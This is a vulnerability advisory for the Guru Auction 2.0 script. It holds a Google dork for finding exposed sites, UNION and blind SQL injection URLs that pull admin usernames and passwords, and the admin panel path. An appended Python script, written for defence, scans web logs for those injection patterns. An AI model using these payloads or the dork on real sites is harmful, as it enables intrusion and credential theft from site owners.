Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
Admin login panel:
~~~~~~~~~~
http://domain.tld/[path]/admin/
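Detection note (added example, not part of the original advisory): both injection points take an id that should only ever be an integer, so a web-server access log can be checked for any cate_id / item_id value that is not a plain integer, with the union/@@version/SUBSTRING strings from the p0cs above as a second, stronger signal. The log lines below are constructed samples in Apache combined format; the script names and parameter names come from the advisory.

```python
import re
from urllib.parse import urlparse, parse_qs

# Scripts and parameters named in the advisory; both ids are expected to be integers.
INT_PARAMS = {"subcat.php": {"cate_id"}, "detail.php": {"item_id"}}

# Constructed sample access-log lines (Apache combined format), not taken from any real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 6310 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:45 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Strings that appear in the advisory's p0cs; matched case-insensitively on the decoded value.
SQLI_RE = re.compile(r"(union\s+(all\s+)?select|@@version|substring\s*\(|group_concat\s*\()", re.I)

def inspect_request(target):
    """Return (param, decoded value, reason) for each monitored id parameter that is not an integer."""
    parsed = urlparse(target)
    script = parsed.path.rsplit("/", 1)[-1]
    findings = []
    for param in INT_PARAMS.get(script, ()):
        # parse_qs percent-decodes and turns '+' into spaces, so '-9999+union+all' becomes '-9999 union all'
        for value in parse_qs(parsed.query, keep_blank_values=True).get(param, []):
            if re.fullmatch(r"-?\d+", value):
                continue  # a plain integer is the only legitimate shape for these ids
            reason = "sqli-keyword" if SQLI_RE.search(value) else "non-integer"
            findings.append((param, value, reason))
    return findings

def scan_log(text):
    """Return one dict per suspicious request found in the log text, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for param, value, reason in inspect_request(m["target"]):
            hits.append({"ip": m["ip"], "ts": m["ts"], "param": param, "value": value, "reason": reason})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A "non-integer" hit with no keyword match is still worth a look, since an attacker can vary the payload freely once the id is confirmed injectable.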